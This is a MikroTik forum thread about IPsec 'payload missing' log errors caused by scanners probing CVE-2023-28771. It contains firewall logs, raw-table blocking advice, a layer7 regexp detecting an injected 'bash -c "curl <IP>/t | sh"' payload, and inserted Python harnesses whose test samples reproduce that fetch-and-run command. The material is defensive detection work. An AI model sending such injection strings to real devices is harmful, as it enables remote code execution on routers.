depth0cert
just joined
Topic Author
Posts: 21
Joined: Thu Sep 08, 2022 11:03 pm

Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Mon Jun 05, 2023 10:03 pm

Hello.

Since last week I have often seen "payload missing: SA" in the logs, and today they were joined by "payload missing: NONCE". I use https://github.com/stamparm/maltrail/bl ... canner.txt to fill the block-lists for 500/UDP and 4500/UDP.
Perhaps there is a best practice to enhance IKEv2 without using white-sheets?
 12:18:49 ipsec,error payload missing: SA
 14:27:56 ipsec,error payload missing: SA
 19:25:38 ipsec,error payload missing: SA
 19:35:39 ipsec,error payload missing: SA
 20:19:57 ipsec,error payload missing: SA
 21:00:38 ipsec,error payload missing: SA
 21:20:38 ipsec,error payload missing: NONCE
 
 
depth0cert
just joined
Topic Author
Posts: 21
Joined: Thu Sep 08, 2022 11:03 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Tue Jun 06, 2023 9:22 pm

14:00:02 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.44:500->xx:xx:xx:xx:xx:xx:500, len 277
14:00:02 ipsec,error payload missing: SA
14:05:08 ipsec,error payload missing: SA
14:05:09 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.44:500->xx:xx:xx:xx:xx:xx:500, len 277
17:23:43 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.44:500->xx:xx:xx:xx:xx:xx:500, len 277
17:23:43 ipsec,error payload missing: SA
17:25:32 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.44:500->xx:xx:xx:xx:xx:xx:500, len 277
17:25:32 ipsec,error payload missing: SA
17:48:30 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
17:48:30 ipsec,error payload missing: SA
17:48:38 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
17:48:38 ipsec,error payload missing: SA
18:00:49 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
18:00:49 ipsec,error payload missing: SA
18:14:30 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
18:14:30 ipsec,error payload missing: SA
18:37:57 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
18:37:57 ipsec,error payload missing: SA
18:41:25 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
18:41:25 ipsec,error payload missing: SA
19:44:54 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
19:44:54 ipsec,error payload missing: SA
19:50:15 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->xx:xx:xx:xx:xx:xx:500, len 277
19:50:15 ipsec,error payload missing: SA
 
Fesiitis
newbie
Posts: 45
Joined: Tue Sep 13, 2016 10:24 am
Location: Latvia, Riga

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Wed Jun 07, 2023 6:42 pm

I'm also seeing a bunch of errors like these for the last few days on all routers that have IPsec configured.
payloadmissing.PNG
I think these are new entries on top of the existing ones (identity not found for peer: FQDN: *something* and identity not found for peer: RFC822: research-scan@sysnet.ucsd.edu), related to this one - https://research-scan.sysnet.ucsd.edu/.
 
depth0cert
just joined
Topic Author
Posts: 21
Joined: Thu Sep 08, 2022 11:03 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Wed Jun 07, 2023 11:10 pm

169.228.66.0/24
- blocked in raw/prerouting a long time ago;
109.207.200.47, 109.207.200.44 and others
- blocked 500/UDP with packet-size=! in raw/prerouting.

You can add a log rule in prerouting for 500/UDP and check the IP of the attacker (109.207.200.0/24). Now the log is clean.
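The triage depth0cert describes (a prerouting log rule for UDP/500, then reading the attacker's IP out of the log next to each ipsec error) can be scripted. The following is an added example, not code from any poster in this thread: it parses the two kinds of RouterOS log lines pasted earlier in the thread, attributes each "payload missing" event to the UDP/500 source that the log rule recorded within a one-second window, and emits address-list commands for repeat sources. The sample log text, the destination address 203.0.113.9, the list name ike-scanners and the hit threshold are all constructed for this example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample, in the format RouterOS prints (modelled on the thread's paste).
# The destination 203.0.113.9 stands in for the router's public address.
SAMPLE_LOG = """\
14:00:02 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.44:500->203.0.113.9:500, len 277
14:00:02 ipsec,error payload missing: SA
14:05:08 ipsec,error payload missing: SA
14:05:09 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.44:500->203.0.113.9:500, len 277
17:48:30 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 109.207.200.47:500->203.0.113.9:500, len 277
17:48:30 ipsec,error payload missing: SA
18:20:00 firewall,info prerouting: in:ether1 out:(unknown 0), connection-state:invalid src-mac 02:90:ba:80:70:2c, proto UDP, 198.51.100.7:500->203.0.113.9:500, len 340
21:20:38 ipsec,error payload missing: NONCE
"""

# A firewall log line produced by a prerouting log rule: we keep the time, source, dst port and length.
FW_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d) firewall,info .*?proto UDP, "
    r"(?P<src>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+)->(?P<dst>[^:]+):(?P<dport>\d+), len (?P<len>\d+)$"
)
# The ipsec error line this thread is about.
IPSEC_RE = re.compile(r"^(?P<ts>\d\d:\d\d:\d\d) ipsec,error payload missing: (?P<payload>\w+)$")


def parse_ts(value: str) -> datetime:
    """RouterOS log lines carry only a time of day; the date is irrelevant for the window test."""
    return datetime.strptime(value, "%H:%M:%S")


def correlate(log_text: str, window_seconds: int = 1):
    """Attribute each 'payload missing' error to UDP/500 sources logged within +/- window_seconds.

    Returns (errors per source, packet lengths seen per source, errors with no matching firewall line).
    """
    firewall, errors = [], []
    for line in log_text.splitlines():
        m = FW_RE.match(line)
        if m:
            firewall.append((parse_ts(m["ts"]), m["src"], int(m["dport"]), int(m["len"])))
            continue
        m = IPSEC_RE.match(line)
        if m:
            errors.append((parse_ts(m["ts"]), m["payload"]))

    window = timedelta(seconds=window_seconds)
    by_src: Counter = Counter()
    lengths = defaultdict(set)
    unattributed = []
    for ts, payload in errors:
        hits = [f for f in firewall if f[2] == 500 and abs(f[0] - ts) <= window]
        if not hits:
            # e.g. the NONCE error in the sample: nothing on UDP/500 was logged near it
            unattributed.append((ts.strftime("%H:%M:%S"), payload))
            continue
        for _, src, _, length in hits:
            by_src[src] += 1
            lengths[src].add(length)
    return by_src, {src: sorted(v) for src, v in lengths.items()}, unattributed


def address_list_commands(by_src, list_name="ike-scanners", min_hits=2, timeout="1d"):
    """Emit RouterOS address-list entries for sources tied to at least min_hits errors."""
    return [
        f"/ip/firewall/address-list/add list={list_name} address={src} timeout={timeout}"
        for src, hits in sorted(by_src.items())
        if hits >= min_hits
    ]


if __name__ == "__main__":
    per_src, per_src_len, orphans = correlate(SAMPLE_LOG)
    for src, hits in per_src.most_common():
        print(f"{src}: {hits} error(s), packet lengths {per_src_len[src]}")
    print("unattributed:", orphans)
    print("\n".join(address_list_commands(per_src)))
```

The address list is meant to be consumed by a raw-table rule of the kind depth0cert mentions; one form that fits (an assumption about the exact rule, not from the thread) is a prerouting raw rule with protocol=udp, dst-port=500,4500, src-address-list=ike-scanners and action=drop. The sample also shows why the correlation step matters: the 198.51.100.7 entry is UDP/500 traffic that triggered no ipsec error, so it is not listed, and the NONCE error with no nearby firewall line is reported separately instead of being blamed on the wrong host.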
 
pizzydmgm
just joined
Posts: 1
Joined: Wed Jan 25, 2023 5:25 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Fri Jun 09, 2023 8:32 am

169.228.66.0/24
- blocked in raw/prerouting a long time ago;
109.207.200.47, 109.207.200.44 and others
- blocked 500/UDP with packet-size=! in raw/prerouting.

You can add a log rule in prerouting for 500/UDP and check the IP of the attacker (109.207.200.0/24). Now the log is clean.
Hello sir. I have the same errors on my router. Can you please share the full firewall rule to block this attack? Thank you in advance!
 
zarkominic
just joined
Posts: 3
Joined: Mon Jun 12, 2023 1:53 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Mon Jun 12, 2023 1:57 pm

169.228.66.0/24
- blocked in raw/prerouting a long time ago;
109.207.200.47, 109.207.200.44 and others
- blocked 500/UDP with packet-size=! in raw/prerouting.

You can add a log rule in prerouting for 500/UDP and check the IP of the attacker (109.207.200.0/24). Now the log is clean.
Hello. I have the same errors on my router. Can you please share the full firewall rule to block this attack? Thank you in advance!
 
depth0cert
just joined
Topic Author
Posts: 21
Joined: Thu Sep 08, 2022 11:03 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Sat Jun 17, 2023 1:26 am

/ip/firewall/layer7-protocol/add name=CVE-2023-28771 regexp=";bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\\/t \\| sh\";echo -n"
/ip/firewall/filter/add action=drop chain=input dst-port=500 layer7-protocol=CVE-2023-28771 protocol=udp

https://packetstormsecurity.com/files/1 ... ution.html
 
zarkominic
just joined
Posts: 3
Joined: Mon Jun 12, 2023 1:53 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Mon Jun 19, 2023 7:53 am

/ip/firewall/layer7-protocol/add name=CVE-2023-28771 regexp=";bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\\/t \\| sh\";echo -n"
/ip/firewall/filter/add action=drop chain=input dst-port=500 layer7-protocol=CVE-2023-28771 protocol=udp

https://packetstormsecurity.com/files/1 ... ution.html
Thank you very much for your reply. I'll check this out and implement it on my router.
 
LurkerBeta
just joined
Posts: 13
Joined: Fri Jul 09, 2021 8:50 am

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Mon Jul 31, 2023 8:46 am

It's funny to find on the Internet my own solution, which I published on another resource.
But this is not a complete solution.
1) There is an error in the syntax, see point 2.
2) This expression was created as a test expression to exclude THEORETICAL false positives, therefore it does not catch similar attacks with another instruction. Right now I'm using the expression ;bash -c "curl [0-9]+\.[0-9]+\.[0-9]+\.[0-9]
3) It protects against payload missing: SA. What kind of payload missing: NONCE it is I don't know at the moment and want to know. The day before yesterday I caught 2 events.
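Two things in the exchange above are easy to get wrong when reusing the layer7 rule: the regexp argument as typed on the RouterOS command line is escaped (\\. and \") and only becomes the real pattern after the CLI unquotes it, and the strict expression pins the whole tail of the string, so it misses the "similar attacks with another instruction" LurkerBeta mentions while the shorter one does not. The following is an added example, not code from the thread or from MikroTik: it reproduces the CLI unquoting (an assumption about RouterOS string syntax: \\ becomes \ and \" becomes " inside a double-quoted argument), compiles both expressions the way the router would see them, and runs them over constructed sample strings (the 203.0.113.5 address and the vpn.example.com identity are made up for the test).

```python
import re


def routeros_unquote(arg: str) -> str:
    """Undo the escaping of a double-quoted RouterOS CLI argument (assumed: \\\\ -> \\, \\" -> ")."""
    out, i = [], 0
    while i < len(arg):
        if arg[i] == "\\" and i + 1 < len(arg) and arg[i + 1] in '\\"':
            out.append(arg[i + 1])
            i += 2
        else:
            out.append(arg[i])
            i += 1
    return "".join(out)


# The two expressions from the thread, exactly as they would be typed after regexp=" ... ".
STRICT_ARG = r';bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\\/t \\| sh\";echo -n'
BROAD_ARG = r';bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]'


def compile_l7(arg: str) -> re.Pattern:
    """Compile the pattern as the router sees it, i.e. after CLI unquoting."""
    return re.compile(routeros_unquote(arg))


# Constructed samples, not captured traffic. The first has the exact shape the strict
# expression encodes, the second differs only in the fetched path and the interpreter,
# the third is an ordinary identity string that must never match.
SAMPLES = {
    "strict_shape": ';bash -c "curl 203.0.113.5/t | sh";echo -n',
    "other_tail": ';bash -c "curl 203.0.113.5/x | bash";echo -n',
    "benign_id": "vpn.example.com",
}


def matches(arg: str) -> dict:
    """Map each sample name to whether the (unquoted) layer7 expression matches it."""
    pattern = compile_l7(arg)
    return {name: bool(pattern.search(text)) for name, text in SAMPLES.items()}


if __name__ == "__main__":
    print("strict pattern :", routeros_unquote(STRICT_ARG))
    print("strict results :", matches(STRICT_ARG))
    print("broad pattern  :", routeros_unquote(BROAD_ARG))
    print("broad results  :", matches(BROAD_ARG))
```

The point of the harness is that a signature is only as good as the test set you run it against: adding a sample for each variant seen in your own logs, plus a few legitimate peer identities, tells you whether a change to the expression widens coverage or introduces false positives before the rule goes into the input chain. If the already-escaped text is pasted somewhere that does not perform CLI unquoting, the pattern compiled from it would demand literal backslashes and match none of the samples, which is one thing to check when the rule is in place but the errors keep appearing.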
 
zarkominic
just joined
Posts: 3
Joined: Mon Jun 12, 2023 1:53 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Thu Aug 03, 2023 7:58 am

It's funny to find on the Internet my own solution, which I published on another resource.
But this is not a complete solution.
1) There is an error in the syntax, see point 2.
2) This expression was created as a test expression to exclude THEORETICAL false positives, therefore it does not catch similar attacks with another instruction. Right now I'm using the expression ;bash -c "curl [0-9]+\.[0-9]+\.[0-9]+\.[0-9]
3) It protects against payload missing: SA. What kind of payload missing: NONCE it is I don't know at the moment and want to know. The day before yesterday I caught 2 events.
Hello sir, can you please send me a link to your solution? I still have many errors of this type in the log. I suppose public sharing of links to other sites is not allowed, therefore my mail is zarkominic.atm@gmail.com
Thanks in advance.
 
sashkok
just joined
Posts: 1
Joined: Sun May 07, 2023 5:30 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Thu Aug 03, 2023 2:11 pm

It's funny to find on the Internet my own solution, which I published on another resource.
But this is not a complete solution.
1) There is an error in the syntax, see point 2.
2) This expression was created as a test expression to exclude THEORETICAL false positives, therefore it does not catch similar attacks with another instruction. Right now I'm using the expression ;bash -c "curl [0-9]+\.[0-9]+\.[0-9]+\.[0-9]
3) It protects against payload missing: SA. What kind of payload missing: NONCE it is I don't know at the moment and want to know. The day before yesterday I caught 2 events.
Thank you. In my case it's working!!!
 
durip
just joined
Posts: 1
Joined: Mon Jul 17, 2023 9:08 pm

Re: Many "payload missing: SA" & "payload missing: NONCE" on 7.9

Tue Dec 26, 2023 7:44 pm

Hello,

What is the proper expression? I tried
- ;bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\\/t \\| sh\";echo -n
- ;bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\"

but the log still shows payload missing: SA errors ...
Thanks.

It's funny to find on the Internet my own solution, which I published on another resource.
But this is not a complete solution.
1) There is an error in the syntax, see point 2.
2) This expression was created as a test expression to exclude THEORETICAL false positives, therefore it does not catch similar attacks with another instruction. Right now I'm using the expression ;bash -c "curl [0-9]+\.[0-9]+\.[0-9]+\.[0-9]
3) It protects against payload missing: SA. What kind of payload missing: NONCE it is I don't know at the moment and want to know. The day before yesterday I caught 2 events.
